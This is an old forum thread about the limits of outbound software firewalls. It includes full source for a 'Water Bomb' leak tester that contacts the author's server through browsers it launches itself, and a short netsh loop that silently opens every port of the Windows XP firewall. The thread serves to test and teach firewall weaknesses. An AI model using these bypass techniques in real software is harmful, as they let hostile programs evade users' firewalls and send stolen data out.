topbanner_forum
  *

avatar image

Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
  • Thursday March 28, 2024, 4:15 pm
  • Proudly celebrating 15+ years online.
  • Donate now to become a lifetime supporting member of the site and get a non-expiring license key for all of our programs.
  • donate

Author Topic: Firewalls, What you need to know...  (Read 13133 times)

PhilKC

  • Charter Member
  • Joined in 2005
  • ***
  • Posts: 117
    • View Profile
    • BlueScreenOfDeath.co.uk
    • Donate to Member
Firewalls, What you need to know...
« on: December 02, 2005, 02:48 AM »
Right, first thing... Get a comfy chair, this is going to be a long post, it's also 6am, and I've been working all night, so, don't expect this to be perfect, I've probably left huge chunks out... BAH  :(...

First, a slight note, I've been asked by a lot of people why they need a firewall if they own a router with NAT. Well, this post, and the tool I supply with it, should explain it. But, as a quick explanation, NAT only prevents incoming connections, not outgoing. :)

Now, onto the main topic, firewalls...

I'm not going to be talking much about a firewalls ability to keep 'hackers' out (although the scare tactics used by some which count port scans as 'Attacks' do annoy me), rather, the ability (or lack) of the firewall to stop a program connecting to the Internet. Why is this so important? Well, every time you download an exe, the first thing it could do is to collect data about you (very easy) and then send it back to a server. That process would take less than a second normally, meaning you have no way to stop it unless you have a firewall...

So, let's extend on that and use it as an example;

0.You have downloaded a small application, thinking it was a game
1. Because it is relatively new/unknown, it is not picked up by your anti virus
2. It brings up a game to distract you
3. It checks the windows registry, browser logs, etc for data
4/5. It creates a connection to it's owners server
4/5. It sends the data

Starting at 0, there is little you can do, if it's advertised as a game, it looks innocent.
Then, moving onto 1 we see the first major myth: Most viruses are picked up by scanners. This is simply wrong, a scanner can only detect known threats and use basic heuristics meaning that if someone where to make a virus today, not one anti virus would detect it. It is essential that you keep your anti virus updated, and that you are using a service which is updated in the first place.
2. A simple tactic, while you watch/play, it delivers it's payload (3, 4 and 5)...
3. These checks won't be detected by any registry 'protection' software, as it does not write to the registry, only read. As mentioned, this step will take less than a second to complete if the code is optimised.
4. This is the first (and ONLY) chance your firewall gets to stop the application. If you do not have a firewall, or it fails to detect this stage it will go straight to 5, otherwise you will be prompted as to the action you want to take, this is the main function I will be talking about.
5. If a connection is made, then, in literally no time, the data is sent, and whatever information the attacker wanted, is theirs.

Now, at step 4, a lot of things happen, and there are a lot of ways those things can happen.

The overall idea of step 4 is to connect to, and send (as part of step 5) the requested information, the simplest way is for the application to try and connect directly and send the data directly too, but, of course, this is picked up by firewalls, and promptly rejected (Assuming the user does not think the program needs to access the internet (Which comes under 'rules' which I will discuss later)). However, there are several other ways for the program to get it's 'message' sent. It could launch your favorite browser, and send the data like that (Again, that will be covered in rules), or, it could launch any application on your computer and use that to send the data, all of this can be done silently too.

Now, rules, they are designed to make your life easier, but, I personally despise them. For example, you allow Firefox.exe access to the internet so it doesn't bug you every time you browse to a page. Well, what if the attacker programmed the application to run Firefox to send the data back? Then, you have a problem, one that, as far as I am aware, is not solvable... You could ask your firewall to ask every time Firefox connects to anyhere, for EVERY connection, but, no one has that much patients. How about allowing Firefox only until you close the browser? That's fine unless you have Firefox open when you run the application, which if you had just downloaded it, you probably would have.

So, you see, ONE rule, for ONE application, especially a browser, is a huge security risk.

I have made a small application, using the Microsoft .NET 2 Framework ( http://www.microsoft...5&DisplayLang=en ) which is designed to test what I call 'Water Bombing', the act of making your firewall, useless to an extent by using multiple methods. It's worth noting that this application is only 113 lines of code, and it does not affect your system in ANY way... If this were a real 'phone home' device, it would have functions to kill firewalls/anti viruses etc... It will attempt to connect a page on my server using normal methods for tests 1 and 2, but 3, 4 and 5 use browsers, to show the potential problem. Finally, 6, the 'Water Bomb' attack uses a combination of all the above techniques to try to connect. If your firewall fails just one of those tests, you need to think seriously about the implications...

http://tanyvska.co.uk/Water%20Bomb (You only need the exe, the txt is the file the program tries to get to (check the source))

Please do post your results of the application, and the firewall you use.

On a side note, the XP SP2 firewall, yay or nay? NAY... Here is a simple code snippet in C++ which would render the XP firewall useless (but NOT disable it, so, no warning messages)

for(int i=1; i<65536; i++) {
system("netsh firewall add portopening ALL " + i + " Windows");
}

There, 3 lines of code, and your beloved XP SP2 firewall is rendered _totally_ useless...

Back on to 'Water Bombing', I asked mouser to test this program first, and, using traditional methods, it would have failed on 3, 4 and 5... However, mouser is a clever little devil, and used his BrowserTraySwitch application to defeat it from loading a real browser and I assume he had otherwise disabled IE. However, when the 'Water Bomb' test was run, it managed to get through, in his own words:
"first firewall leak test to beat me in fact"
This is not an issue to be taken lightly, the attacker does not need to know a huge ammount of a language to make an application that uses these techniques.

As for a solution to 'Water Bombing', well, I don't see one... But, rest assured, the first firewall to protect a user against these tactics without huge amounts of configuration/hassle will be getting a nice little review. ;)

Relying on a firewall is dangerous, I hope this has made people see that.

Whew! All done, Thank you for your time, I hope I've given you something to think about, and, who knows, if mouser doesn't mind me spamming his forum ever week or so, I might do something like this every now and then. :)

Oh, and here is the source to the 'Water Bomb' testing program...

#include "stdafx.h"

using namespace System;
using namespace System::Diagnostics;
using namespace System::Net::Sockets;

int main(array<System::String ^> ^args)
{
Console::Title = "Water Bomb [1.00] by PhilKC";
String^ mainMenu = "Water Bomb firewall tester, created by PhilKC [1.00]\n\nModes of operation:\n\n0: Info\n1: Try to access the internet directly using a TCPClient\n2: Try to access the internet directly using a WebClient\n3: Try to access the internet via the default browser\n4: Try to access the internet via IE\n5: Try to access the internet via IE being launched via CMD\n6: 'Water Bomb' test (Methods 1, 2 and a special browser call)\n\nA malicious program trying to 'Phone home'\nwould probably be best replicated using 6\n\nPlease select your choice: ";
String^ checkURL = "http://tanyvska.co.uk/Water%20Bomb/Data.txt";
Start:
Console::Clear();
Console::Write(mainMenu);
String^ method = Console::ReadLine();
if (method == "0") {
Console::Clear();
Console::WriteLine("This application is designed to dispel myths that firewalls or routers\ngive 'enough' protection...\n\nIf this application can produce the word 'FAILED', just once,\nthen it consider this:\n\nNO information is sent from your PC (only requests for pages on my server),\nhowever, the data that is sent (As part of the requests), could have\nbeen passwords, credit cards, anything...\n\nIf you do find a firewall which protects you against the level 6 'Water Bomb'\nplease E-mail me: [email protected] as I'm always interested\nto know which firewalls do the best...");
Console::WriteLine("\nPress Enter to continue");
Console::ReadLine();
goto Start;
}
else if (method == "1") {
String^ method1Text;
TcpClient^ Client = gcnew TcpClient();
try {
Client->Connect("tanyvska.co.uk", 80);
method1Text = "Data transmitted and recieved (FAILED)";
}
catch (SocketException^ Ex) {
method1Text = "No data retrevied (PASS) Full error:\n" + Ex->ToString();
}
Console::WriteLine("\n" + method1Text + "\n\nPress Enter to continue");
Console::ReadLine();
goto Start;
} else if (method == "2") {
Net::WebClient^ method2 = gcnew Net::WebClient();
method2->Headers->Add("user-agent", "Water Bomb (Method 1)");
String^ method2Text;
try {
method2Text = Text::Encoding::ASCII->GetString(method2->DownloadData(checkURL));
}
catch (Net::WebException^ Ex) {
method2Text = "No data retrevied (PASS) Full error:\n" + Ex->ToString();
}
Console::WriteLine("\n" + method2Text + "\n\nPress Enter to continue");
Console::ReadLine();
goto Start;
} else if (method == "3") {
Process^ method3 = gcnew Process();
method3->StartInfo->FileName = checkURL;
Console::WriteLine("\nNow launching...");
method3->Start();
Console::WriteLine("\nIf a browser did not open with \"Data transmitted and recieved (FAILED)\" then consider it a PASS\n\nPress Enter to continue");
Console::ReadLine();
goto Start;
} else if (method == "4") {
Process^ method4 = gcnew Process();
Microsoft::Win32::RegistryKey^ rk = Microsoft::Win32::Registry::LocalMachine->OpenSubKey("SOFTWARE\\Clients\\StartMenuInternet\\iexplore.exe\\shell\\open\\command");
method4->StartInfo->FileName = rk->GetValue("")->ToString();
method4->StartInfo->Arguments = checkURL;
method4->Start();
Console::WriteLine("\nIf a browser did not open with \"Data transmitted and recieved (FAILED)\" then consider it a PASS\n\nPress Enter to continue");
Console::ReadLine();
goto Start;
} else if (method == "5") {
Process^ method5 = gcnew Process();
method5->StartInfo->FileName = "CMD";
method5->StartInfo->Arguments = "/c \"\"%ProgramFiles%\\Internet Explorer\\iexplore.exe\" http://tanyvska.co.uk/Water Bomb/Data.txt\"";
method5->Start();
Console::WriteLine("\nIf a browser did not open with \"Data transmitted and recieved (FAILED)\" then consider it a PASS\n\nPress Enter to continue");
Console::ReadLine();
goto Start;
} else if (method == "6") {
TcpClient^ Client = gcnew TcpClient();
try {
Client->Connect("tanyvska.co.uk", 80);
Console::WriteLine("\nMethod 0: Data transmitted and recieved (FAILED)\n");
}
catch (SocketException^ Ex) {
Console::WriteLine("\nMethod 0: No data retrevied (PASS) Full error:\n" + Ex->ToString() + "\n");
}
Net::WebClient^ method61 = gcnew Net::WebClient();
method61->Headers->Add("user-agent", "Water Bomb (Method 1)");
try {
Console::WriteLine("Method 1: " + Text::Encoding::ASCII->GetString(method61->DownloadData(checkURL)) + "\n");
}
catch (Net::WebException^ Ex) {
Console::WriteLine("Method 1: No data retrevied (PASS) Full error:\n" + Ex->ToString() + "\n");
}
Microsoft::Win32::RegistryKey^ rk = Microsoft::Win32::Registry::LocalMachine->OpenSubKey("SOFTWARE\\Clients\\StartMenuInternet");
System::Collections::ArrayList keyList = gcnew System::Collections::ArrayList;
for each(String^ subkey in rk->GetSubKeyNames()) {
keyList.Add(subkey);
}
for(int i=0; i<keyList.Count; i++) {
rk = Microsoft::Win32::Registry::LocalMachine->OpenSubKey("SOFTWARE\\Clients\\StartMenuInternet\\" + keyList[i] + "\\shell\\open\\command");
Process^ method5 = gcnew Process();
method5->StartInfo->FileName = rk->GetValue("")->ToString();
method5->StartInfo->Arguments = checkURL;
method5->Start();
}
Console::WriteLine("If browsers did not open with \"Data transmitted and recieved (FAILED)\" then consider it a PASS\n\nPress Enter to continue");
Console::ReadLine();
goto Start;
}
else {
Console::WriteLine("\nInvalid selection" + "\n\nPress Enter to continue");
Console::ReadLine();
goto Start;
}
    return 0;
}

PhilKC
It's not a bug, it's an undocumented and unexplainable feature.
Stick it on your site:

Carol Haynes

  • Waffles for England (patent pending)
  • Global Moderator
  • Joined in 2005
  • *****
  • Posts: 8,066
    • View Profile
    • Donate to Member
Re: Firewalls, What you need to know...
« Reply #1 on: December 02, 2005, 03:58 AM »
Worrying ...

Rubbish follows - see below for correction ...
Sygate Firewall Pro (yes the dead one which I have reinstalled after more bad experiences with ZoneAlarm) managed to pass this test provided there wasn't an Internet Explorer based browser window open at the time.

With Firefox as default browser caused no problem provided I didn't have Explorer of Maxthon (based on Explorer) windows open.

The other problem is that in order to get this to work it requires that you deny access to the internet when you run this app. Often when you run a new program you have to allow access to the internet to allow the program to function in the expected way - then the firewall is completely useless ...

Have you reported this security problem to MS ??? Strikes me the problem lies in a large measure at their door !!
« Last Edit: December 02, 2005, 04:08 AM by CarolHaynes »

PhilKC

  • Charter Member
  • Joined in 2005
  • ***
  • Posts: 117
    • View Profile
    • BlueScreenOfDeath.co.uk
    • Donate to Member
Re: Firewalls, What you need to know...
« Reply #2 on: December 02, 2005, 04:02 AM »
Sygate Firewall Pro (yes the dead one which I have reinstalled after more bad experiences with ZoneAlarm) managed to pass this test provided there wasn't an Internet Explorer based browser window open at the time.

It pases the level 6 option? Impressive if so... As for talking to microsoft? "Oh, hello Mr Brick Wall, how are you today..."

PhilKC
It's not a bug, it's an undocumented and unexplainable feature.
Stick it on your site:

Carol Haynes

  • Waffles for England (patent pending)
  • Global Moderator
  • Joined in 2005
  • *****
  • Posts: 8,066
    • View Profile
    • Donate to Member
Re: Firewalls, What you need to know...
« Reply #3 on: December 02, 2005, 04:06 AM »
Correction - it doesn't work ... sorry, I had Firefox blocked before running WaterBomb.

I do think you should consider telling Microsoft - especially as you have openly published the code on this website - anyone could use your code to breach security and I strongly sugggest you remove it.

If you don't want the hassle of contacting MS there are plenty of security watchers out there with direct MS contacts that would probably do it for you.

PhilKC

  • Charter Member
  • Joined in 2005
  • ***
  • Posts: 117
    • View Profile
    • BlueScreenOfDeath.co.uk
    • Donate to Member
Re: Firewalls, What you need to know...
« Reply #4 on: December 02, 2005, 04:12 AM »
If you don't want the hassle of contacting MS there are plenty of security watchers out there with direct MS contacts that would probably do it for you.

I know of one or two people in Microsoft, but, the problem is, patches take months, years sometimes to come out, hence, i'm throwing it open to the community, maybe they can find a good fix...

PhilKC
It's not a bug, it's an undocumented and unexplainable feature.
Stick it on your site:

mouser

  • First Author
  • Administrator
  • Joined in 2005
  • *****
  • Posts: 40,896
    • View Profile
    • Mouser's Software Zone on DonationCoder.com
    • Read more about this member.
    • Donate to Member
Re: Firewalls, What you need to know...
« Reply #5 on: December 02, 2005, 04:32 AM »
awesome post.

as i was telling philKC on the irc chat, this is the first firewall leak tester that beats me, because it tries to run any non-default browsers it finds on the system, and while i have my default browser blocked, i have others which are allowed to connect through the internet.

the way to defeat this is (and now this is the first demonstration i've seen of why its important) to have security that alterts you to when one program tries to launch another, and allows you to set rules restricting that.  this might still not protect you if the app is already running, but it would save you from most situations.

checking whether your firewalls can block such launches of other programs.  agnitum has some support for this but i have it disabled - i guess its time for me to rethink this..

I also want to comment on the idea of blocking outgoing connections:

I agree 100% with PhilKC that having good outgoing blocking in your firewall is critical - you really do need a firewall with good outgoing blocking rules, but as a layer of protection defense, and as a good way of keeping track of what programs are tring to send information where.

However, it's very important to realize that no matter how good your firewall is, if you actually launch an evil program on your computer, you have lost.

No matter how good your firewall is, launching a trojan on your pc allows it to do whatever it wants and breaching your firewall may be the least of your problems.  Other registry defense and sandboxing tools may help you a little, but basically such a program can do all sorts of damage i think that are going to be hard to stop if the program is truly determined.

To quote from War Games, the only way to win is not to play.

The most important thing is just to not run programs on your pc unless you really trust them.  One exception to this so far is the use of virtual machines, which is making it easier to safely run questionable stuff, since they offer much better sandboxing than other approaches.  In addition to VMWare, there are some free virtual machine tools which may work well enough for this purpose, and it's worth your while to get a virtual machine tool if you do a lot of software testing of questionable files.  See our review here: https://www.donation...alMachine/index.html

mouser

  • First Author
  • Administrator
  • Joined in 2005
  • *****
  • Posts: 40,896
    • View Profile
    • Mouser's Software Zone on DonationCoder.com
    • Read more about this member.
    • Donate to Member
Re: Firewalls, What you need to know...
« Reply #6 on: December 02, 2005, 04:34 AM »
i also wanted to post an extra thanks to philKC who found an amazing registry key: "SOFTWARE\\Clients\\StartMenuInternet\\" which apparently lists all installed browsers on your computer (works for me!), and will be useful to me for next version of browser tray switch.

ps. i dont know what this registry key does - one way to thwart this attack is to rename that key if its not used for anything important.. the basic attack though could easily use other ways to locate common browser installations.

PhilKC

  • Charter Member
  • Joined in 2005
  • ***
  • Posts: 117
    • View Profile
    • BlueScreenOfDeath.co.uk
    • Donate to Member
Re: Firewalls, What you need to know...
« Reply #7 on: December 02, 2005, 04:40 AM »
However, it's very important to realize that no matter how good your firewall is, if you actually launch an evil program on your computer, you have lost.

And with the increase in IM programs being used to transmit Virii through a trusted source (your friend), it's becoming very difficult to know what's evil...

one way to thwart this attack is to rename that key if its not used for anything important.. the basic attack though could easily use other ways to locate common browser installations.

As you said, "this" attack... If the source was closed, and this was in compacted c++, there would be no way to know the key... We (computer users) need a solution, and, in my eyes, it's the firewall makers whom are lagging behind

PhilKC
It's not a bug, it's an undocumented and unexplainable feature.
Stick it on your site:

Carol Haynes

  • Waffles for England (patent pending)
  • Global Moderator
  • Joined in 2005
  • *****
  • Posts: 8,066
    • View Profile
    • Donate to Member
Re: Firewalls, What you need to know...
« Reply #8 on: December 02, 2005, 05:11 AM »
As you said, "this" attack... If the source was closed, and this was in compacted c++, there would be no way to know the key... We (computer users) need a solution, and, in my eyes, it's the firewall makers whom are lagging behind

They may be lagging behind - but the real issue is really at Microsoft's door - if WindowsXP had some semblance of security built in most of the third party security providers would be unnecessary. I guess MS are being philanthropic!

One solution to this problem is to run something like DiamondCS Process Guard all the time, and don't allow programmes (and I suppose especially browsers) to run automatically (just click OK each time it is an intentional launch). It wouldn't stop the problem if browser windows are already open but it would stop any browser being launched by another program without permission.

The biggest problem I can see is that we have to trust so many programs - many usefully check for updates, use webpages to provide help and support from within the application, use the Internet Explorer engine to display their pages (eg. how many people are running Weather Watcher? that is basically Internet Explorer running all the time it is loaded).

nudone

  • Cody's Creator
  • Columnist
  • Joined in 2005
  • ***
  • Posts: 4,119
    • View Profile
    • Donate to Member
Re: Firewalls, What you need to know...
« Reply #9 on: December 03, 2005, 10:24 AM »
great post PhilKC.

can't wait to read the next installment.

delwoode

  • Supporting Member
  • Joined in 2008
  • **
  • Posts: 146
    • View Profile
    • Donate to Member
Re: Firewalls, What you need to know...
« Reply #10 on: August 25, 2009, 08:13 AM »
@Mouser
quote "as i was telling philKC on the irc chat, this is the first firewall leak tester that beats me, because it tries to run any non-default browsers it finds on the system, and while i have my default browser blocked, i have others which are allowed to connect through the internet."

it runs non default browsers, would it also find portable browsers on your hard drive?

mouser

  • First Author
  • Administrator
  • Joined in 2005
  • *****
  • Posts: 40,896
    • View Profile
    • Mouser's Software Zone on DonationCoder.com
    • Read more about this member.
    • Donate to Member
Re: Firewalls, What you need to know...
« Reply #11 on: August 25, 2009, 08:20 AM »
would it also find portable browsers on your hard drive?
while it could be programmed to do so, this is very very unlikely.
you could make it impossible if you changed the exe filename of your browser.

40hz

  • Supporting Member
  • Joined in 2007
  • **
  • Posts: 11,857
    • View Profile
    • Donate to Member
Re: Firewalls, What you need to know...
« Reply #12 on: August 25, 2009, 09:27 AM »
The most important thing is just to not run programs on your pc unless you really trust them.  One exception to this so far is the use of virtual machines, which is making it easier to safely run questionable stuff, since they offer much better sandboxing than other approaches.  In addition to VMWare, there are some free virtual machine tools which may work well enough for this purpose, and it's worth your while to get a virtual machine tool if you do a lot of software testing of questionable files.

Another possible approach is to use any of the live Linux distros when browsing in places where you have cause for concern.


f0dder

  • Charter Honorary Member
  • Joined in 2005
  • ***
  • Posts: 9,153
  • [Well, THAT escalated quickly!]
    • View Profile
    • f0dder's place
    • Read more about this member.
    • Donate to Member
Re: Firewalls, What you need to know...
« Reply #13 on: August 25, 2009, 09:52 AM »
Old thread :)

Run as a non-admin user (and if on Win7, crank UAC all the way to the top). Don't run random crap from unreputable sources. Presto: no need for a software firewall.

If you get bad stuff on your system, all bets are off so you might as well not run a software firewall; there's too many possibilities of subverting them. And even if you have something that's not easily bypassed, you need high paranoia settings with a lot of bo-ther-some popups in order to have any security at all - usually leading to auto-rules and yes-clicking and a false sense of security.

NAT'ing router (without any DMZ crap!) + limited user account + common sense = great success. Add some antivirus software and perhaps a non-IE browser (though IE8 is OK) to the mix if you want to, but an outbound software firewall is really just a lullaby.
- carpe noctem

mouser

  • First Author
  • Administrator
  • Joined in 2005
  • *****
  • Posts: 40,896
    • View Profile
    • Mouser's Software Zone on DonationCoder.com
    • Read more about this member.
    • Donate to Member
Re: Firewalls, What you need to know...
« Reply #14 on: August 25, 2009, 11:07 AM »
Since it happens so rarely let me disagree with f0dder while I have the chance.

I think f0dder's main point is completely valid, which is:
If you run an evil program on your computer, even if you have a perfect software firewall, you have bigger problems on your hands and the evil program can do all sorts of bad things to your pc, and figure out ways to get around your firewall if it really wants to.

While that's true -- I think it skips over some important points.  Having multiple lines of defense is in practice extremely useful in protecting yourself against badly behaved software and rogue software.

A firewall can be a really useful first line of defense in alerting you when something unusual is going on and when a program is trying to connect out to the internet unexpectedly.

I can't count the number of times that my firewall has alerted me about some newly installed program or driver making a web connection that I would have otherwise had no idea about -- and which prompted me to investigate further what was going on.  In some cases it has been extremely useful in diagnosing slow startups, program hangs, etc.

In addition, I just like to know what's going on on my pc and I like the fact that a software firewall tells me when programs are trying to connect to the web. And I like having a second layer of defense in my remote control tools, etc.

Having said all that -- firewalls can also introduce all kinds of tricky-to-diagnose gremlins that occur when they get it into their heads to block stuff silently and cause programs to stop working with no sign of why.

Adding all that up my approach is to use a software firewall and configure it to alert me about anything that i haven't specifically configured it to allow, and to not block anything I don't specifically say to block.  So for me, the firewall is mostly used as an "unexpected-connection alerter" -- much more than it is used to actually BLOCK stuff.  And i find it extremely valuable in this regard.

Stoic Joker

  • Honorary Member
  • Joined in 2008
  • **
  • Posts: 6,646
    • View Profile
    • Donate to Member
Re: Firewalls, What you need to know...
« Reply #15 on: August 25, 2009, 01:48 PM »
A firewall can be a really useful first line of defense in alerting you when something unusual is going on and when a program is trying to connect out to the internet unexpectedly.

I can't count the number of times that my firewall has alerted me about some newly installed program or driver making a web connection that I would have otherwise had no idea about -- and which prompted me to investigate further what was going on.  In some cases it has been extremely useful in diagnosing slow startups, program hangs, etc.

In addition, I just like to know what's going on on my pc and I like the fact that a software firewall tells me when programs are trying to connect to the web. And I like having a second layer of defense in my remote control tools, etc.
I usually use netstat /n for that - But field work tends to require you to use (work with only) what's there.

Having said all that -- firewalls can also introduce all kinds of tricky-to-diagnose gremlins that occur when they get it into their heads to block stuff silently and cause programs to stop working with no sign of why.
Now this I see constantly in the field.